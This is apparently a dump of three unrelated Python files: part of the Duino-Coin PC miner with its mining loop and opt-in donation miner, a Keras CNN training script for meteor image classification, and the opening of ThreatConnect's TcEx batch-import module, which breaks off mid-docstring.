config.write(configfile)
# Calulate efficiency for later use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = config["Duino-Coin-PC-Miner"]["soc_timeout"]
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
# Calulate efficiency for use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
def Donate():
global donation_level
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:3333 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
prettyPrint(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donation_level) == 5:
cmd += "80"
elif int(donation_level) == 4:
cmd += "60"
elif int(donation_level) == 3:
cmd += "40"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debug_output(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
prettyPrint(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean):
# Mining section for every thread
while True:
# Grab server IP and port
while True:
try:
# Use request to grab data from raw github file
res = requests.get(server_ip_file, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
# Line 1 = IP
masterServer_address = content[0]
# Line 2 = port
masterServer_port = 2813 # content[1]
debug_output(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port))
break
except Exception as e:
# If there was an error with grabbing data from GitHub
prettyPrint(
"net"
+ str(threadid),
getString("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debug_output("GitHub error: " + str(e))
sleep(10)
# Connect to the server
while True:
try:
soc = socket()
# Establish socket connection to the server
soc.connect((str(masterServer_address),
int(masterServer_port)))
soc.settimeout(SOC_TIMEOUT)
serverVersion = soc.recv(3).decode().rstrip(
"\n") # Get server version
debug_output("Server version: " + serverVersion)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
prettyPrint("net" + str(threadid),
" Server message: " + motd,
"warning")
if float(serverVersion) <= float(MINER_VER):
# If miner is up-to-date, display a message and continue
prettyPrint(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
# Miner is outdated
prettyPrint(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
break
except Exception as e:
# Socket connection error
prettyPrint(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
prettyPrint(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
prettyPrint("cpu" + str(threadid),
" Server message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
prettyPrint("sys0",
" " + getString("max_hashrate_notice"),
"warning")
uptime, uptime_type = calculate_uptime(start_time)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ✓"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ "∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms. ∙"
+ " uptime "
+ str(uptime)
+ " "
+ uptime_type)
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
break
except Exception as e:
prettyPrint(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def prettyPrint(messageType, message, state):
# Print output messages in the DUCO "standard"
# Usb/net/sys background
if messageType.startswith("net"):
background = Back.BLUE
elif messageType.startswith("cpu"):
background = Back.YELLOW
if messageType.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ messageType
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
# Processor info
cpu = cpuinfo.get_cpu_info()
# Colorama
init(autoreset=True)
title(getString("duco_python_miner") + str(MINER_VER) + ")")
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
prettyPrint(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
prettyPrint(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
prettyPrint(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debug_output("Error launching donation thread: " + str(e))
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean))
thread[x].start()
except Exception as e:
prettyPrint(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
results_2_16_code.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, BatchNormalization
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from os.path import join
from os import listdir
import multiprocessing
from tensorflow.keras.regularizers import l2
from tensorflow.keras.constraints import unit_norm
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss, getProblematicMeteors
def trainCNN():
tf.keras.backend.clear_session()
modelNumber = 'model_2_16'
base_dir = 'C:\work_dir\meteorData\extraData_70_30' # We don't use filtered data ... Not so useful
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution: tuple = (300, 300) # (432, 432)
ImageResolutionGrayScale: tuple = (300, 300, 1) # (432, 432, 1)
DROPOUT: float = 0.30
EPOCHS: int = 30
LEARNING_RATE: float = 5e-4
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size: int = 64
steps_per_epoch: int = int(training_images / batch_size)
validation_steps: int = int(validation_images / batch_size)
# Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0 / 255)
validation_datagen = ImageDataGenerator(rescale=1.0 / 255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (.3) vs model_2_06 (no dropout) vs model_2_07 (.4) vs model_2_08 (.5):
# model 2.9 -> Simple CNN (5 conv layers + 2 fully-connected) -> Only 123,209 parameters. Training time: 550 s/epoch
# model 2.10 -> 2.9 with filtered data
# model 2.11 -> Very complex CNN + BatchNormalization (???) -> ??? parameters. Training time: ???
# model 2.12 -> Add regularization and weight constrains : Not so useful (discarded)
# [kernel_regularizer=l2(l=0.01) + kernel_constraint=unit_norm() + BatchNormalization()]
# new model 2.12 -> BatchNormalization + kernel_regularizer
# model 2.13 -> BatchNormalization + unit_norm()
# model 2.14 -> Make it simpler in order to avoid overfitting
# model 2.15 -> Simpler and smaller input size
# model 2.16 -> Simpler
model = tf.keras.models.Sequential([
Conv2D(8, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale,
strides=1, kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(12, (5, 5), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(12, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
Conv2D(4, (2, 2), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
# Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# MaxPooling2D(pool_size=(2, 2)),
# BatchNormalization(),
# Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# MaxPooling2D(pool_size=(2, 2)),
# BatchNormalization(),
# Conv2D(16, (2, 2), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# Conv2D(8, (2, 2), activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
# MaxPooling2D(pool_size=(2, 2)),
# BatchNormalization(),
Flatten(),
Dense(196, activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
BatchNormalization(),
Dense(8, activation='elu', kernel_initializer='he_uniform', kernel_constraint=unit_norm()),
BatchNormalization(),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=LEARNING_RATE)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if ((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
callback_90_90 = SaveModelCallback(0.90, 0.90)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=EPOCHS,
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_90_90])
# model.load_weights(join(results_dir_weights, 'model_2_11_acc_0.919_val_acc_0.899.h5'))
# dataDir = 'C:\work_dir\meteorData\extra_data_filtered_30'
# problematicFile = join('G:\GIEyA\TFG\meteor_classification\\results_2', 'problematicData_40_1.txt')
# getProblematicMeteors(model, dataDir, ImageResolution, problematicFile, margin=0.40)
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution,
join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
batch.py
|
"""ThreatConnect Batch Import Module."""
# standard library
import gzip
import hashlib
import json
import math
import os
import re
import shelve
import sys
import threading
import time
import traceback
import uuid
from collections import deque
from typing import Any, Callable, Optional, Tuple, Union
from .group import (
Adversary,
Campaign,
Document,
Email,
Event,
Group,
Incident,
IntrusionSet,
Report,
Signature,
Threat,
)
from .indicator import (
ASN,
CIDR,
URL,
Address,
EmailAddress,
File,
Host,
Indicator,
Mutex,
RegistryKey,
UserAgent,
custom_indicator_class_factory,
)
# import local modules for dynamic reference
module = __import__(__name__)
class Batch:
"""ThreatConnect Batch Import Module"""
def __init__(
self,
tcex: object,
owner: str,
action: Optional[str] = 'Create',
attribute_write_type: Optional[str] = 'Replace',
halt_on_error: Optional[bool] = True,
playbook_triggers_enabled: Optional[bool] = False,
):
"""Initialize Class properties.
Args:
tcex: An instance of TcEx object.
owner: The ThreatConnect owner for Batch action.
action: Action for the batch job ['Create', 'Delete'].
attribute_write_type: Write type for Indicator attributes ['Append', 'Replace'].
halt_on_error: If True any batch error will halt the batch job.
playbook_triggers_enabled: **DEPRECATED**
"""
self.tcex = tcex
self._action = action
self._attribute_write_type = attribute_write_type
self._halt_on_error = halt_on_error
self._owner = owner
self._playbook_triggers_enabled = playbook_triggers_enabled
# properties
self._batch_max_chunk = 5000
self._batch_max_size = 75_000_000 # max size in bytes
self._file_merge_mode = None
self._file_threads = []
self._hash_collision_mode = None
self._submit_thread = None
# shelf settings
self._group_shelf_fqfn = None
self._indicator_shelf_fqfn = None
# global overrides on batch/file errors
self._halt_on_batch_error = None
self._halt_on_file_error = None
self._halt_on_poll_error = None
# debug/saved flags
self._saved_xids = None
self._saved_groups = None # indicates groups shelf file was provided
self._saved_indicators = None # indicates indicators shelf file was provided
self.enable_saved_file = False
# default properties
self._batch_data_count = None
self._poll_interval = None
self._poll_interval_times = []
self._poll_timeout = 3600
# containers
self._groups = None
self._groups_shelf = None
self._indicators = None
self._indicators_shelf = None
# build custom indicator classes
self._gen_indicator_class()
# batch debug/replay variables
self._debug = None
self.debug_path = os.path.join(self.tcex.args.tc_temp_path, 'DEBUG')
self.debug_path_batch = os.path.join(self.debug_path, 'batch_data')
self.debug_path_group_shelf = os.path.join(self.debug_path, 'groups-saved')
self.debug_path_indicator_shelf = os.path.join(self.debug_path, 'indicators-saved')
self.debug_path_files = os.path.join(self.debug_path, 'batch_files')
self.debug_path_xids = os.path.join(self.debug_path, 'xids-saved')
@property
def _critical_failures(self): # pragma: no cover
"""Return Batch critical failure messages."""
return [
'Encountered an unexpected Exception while processing batch job',
'would exceed the number of allowed indicators',
]
def _gen_indicator_class(self): # pragma: no cover
"""Generate Custom Indicator Classes."""
for entry in self.tcex.indicator_types_data.values():
name = entry.get('name')
class_name = name.replace(' ', '')
# temp fix for API issue where boolean are returned as strings
entry['custom'] = self.tcex.utils.to_bool(entry.get('custom'))
if class_name in globals():
# skip Indicator Type if a class already exists
continue
# Custom Indicator can have 3 values. Only add the value if it is set.
value_fields = []
if entry.get('value1Label'):
value_fields.append(entry['value1Label'])
if entry.get('value2Label'):
value_fields.append(entry['value2Label'])
if entry.get('value3Label'):
value_fields.append(entry['value3Label'])
value_count = len(value_fields)
class_data = {}
# Add Class for each Custom Indicator type to this module
custom_class = custom_indicator_class_factory(name, Indicator, class_data, value_fields)
setattr(module, class_name, custom_class)
# Add Custom Indicator Method
self._gen_indicator_method(name, custom_class, value_count)
def _gen_indicator_method(
self, name: str, custom_class: object, value_count: int
) -> None: # pragma: no cover
"""Dynamically generate custom Indicator methods.
Args:
name (str): The name of the method.
custom_class (object): The class to add.
value_count (int): The number of value parameters to support.
"""
method_name = name.replace(' ', '_').lower()
# Add Method for each Custom Indicator class
def method_1(value1: str, xid, **kwargs): # pylint: disable=possibly-unused-variable
"""Add Custom Indicator data to Batch object"""
indicator_obj = custom_class(value1, xid, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def method_2(
value1: str, value2: str, xid, **kwargs
): # pylint: disable=possibly-unused-variable
"""Add Custom Indicator data to Batch object"""
indicator_obj = custom_class(value1, value2, xid, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
def method_3(
value1: str, value2: str, value3: str, xid, **kwargs
): # pylint: disable=possibly-unused-variable
"""Add Custom Indicator data to Batch object"""
indicator_obj = custom_class(value1, value2, value3, xid, **kwargs)
return self._indicator(indicator_obj, kwargs.get('store', True))
method = locals()[f'method_{value_count}']
setattr(self, method_name, method)
def _group(
self, group_data: Union[dict, object], store: Optional[bool] = True
) -> Union[dict, object]:
"""Return previously stored group or new group.
Args:
group_data: An Group dict or instance of Group object.
store: If True the group data will be stored in instance list.
Returns:
Union[dict, object]: The new Group dict/object or the previously stored dict/object.
"""
if store is False:
return group_data
if isinstance(group_data, dict):
# get xid from dict
xid = group_data.get('xid')
else:
# get xid from object
xid = group_data.xid
if self.groups.get(xid) is not None:
# return existing group from memory
group_data = self.groups.get(xid)
elif self.groups_shelf.get(xid) is not None:
# return existing group from shelf
group_data = self.groups_shelf.get(xid)
else:
# store new group
self.groups[xid] = group_data
return group_data
def _indicator(
self, indicator_data: Union[dict, object], store: Optional[bool] = True
) -> Union[dict, object]:
"""Return previously stored indicator or new indicator.
Args:
indicator_data: An Indicator dict or instance of Indicator object.
store: If True the indicator data will be stored in instance list.
Returns:
Union[dict, object]: The new Indicator dict/object or the previously stored dict/object.
"""
if store is False:
return indicator_data
if isinstance(indicator_data, dict):
# get xid from dict
xid = indicator_data.get('xid')
else:
# get xid from object
xid = indicator_data.xid
if self.indicators.get(xid) is not None:
# return existing indicator from memory
indicator_data = self.indicators.get(xid)
elif self.indicators_shelf.get(xid) is not None:
# return existing indicator from shelf
indicator_data = self.indicators_shelf.get(xid)
else:
# store new indicators
self.indicators[xid] = indicator_data
return indicator_data
@staticmethod
def _indicator_values(indicator: str) -> list:
"""Process indicators expanding file hashes/custom indicators into multiple entries.
Args:
indicator: Indicator value represented as " : " delimited string.
Returns:
list: The list of indicators split on " : ".
"""
indicator_list = [indicator]
if indicator.count(' : ') > 0:
# handle all multi-valued indicators types (file hashes and custom indicators)
indicator_list = []
# group 1 - lazy capture everything to first <space>:<space> or end of line
iregx_pattern = r'^(.*?(?=\s\:\s|$))?'
iregx_pattern += r'(?:\s\:\s)?' # remove <space>:<space>
# group 2 - look behind for <space>:<space>, lazy capture everything
# to look ahead (optional <space>):<space> or end of line
iregx_pattern += r'((?<=\s\:\s).*?(?=(?:\s)?\:\s|$))?'
iregx_pattern += r'(?:(?:\s)?\:\s)?' # remove (optional <space>):<space>
# group 3 - look behind for <space>:<space>, lazy capture everything
# to look ahead end of line
iregx_pattern += r'((?<=\s\:\s).*?(?=$))?$'
iregx = re.compile(iregx_pattern)
indicators = iregx.search(indicator)
if indicators is not None:
indicator_list = list(indicators.groups())
return indicator_list
@property
def action(self):
"""Return batch action."""
return self._action
@action.setter
def action(self, action):
"""Set batch action."""
self._action = action
def add_group(self, group_data: dict, **kwargs) -> Union[dict, object]:
"""Add a group to Batch Job.
.. code-block:: javascript
{
"name": "Example Incident",
"type": "Incident",
"attribute": [{
"type": "Description",
"displayed": false,
"value": "Example Description"
}],
"xid": "e336e2dd-5dfb-48cd-a33a-f8809e83e904",
"associatedGroupXid": [
"e336e2dd-5dfb-48cd-a33a-f8809e83e904:58",
],
"tag": [{
"name": "China"
}]
}
Args:
group_data: The full Group data including attributes, labels, tags, and
associations.
store: (bool, kwargs): Advanced - Defaults to True. If True
the indicator data will be stored in instance list.
Returns:
Union[dict, object]: The new group dict/object or the previously stored dict/object.
"""
return self._group(group_data, kwargs.get('store', True))
def add_indicator(self, indicator_data: dict, **kwargs) -> Union[dict, object]:
"""Add an indicator to Batch Job.
.. code-block:: javascript
{
"type": "File",
"rating": 5.00,
"confidence": 50,
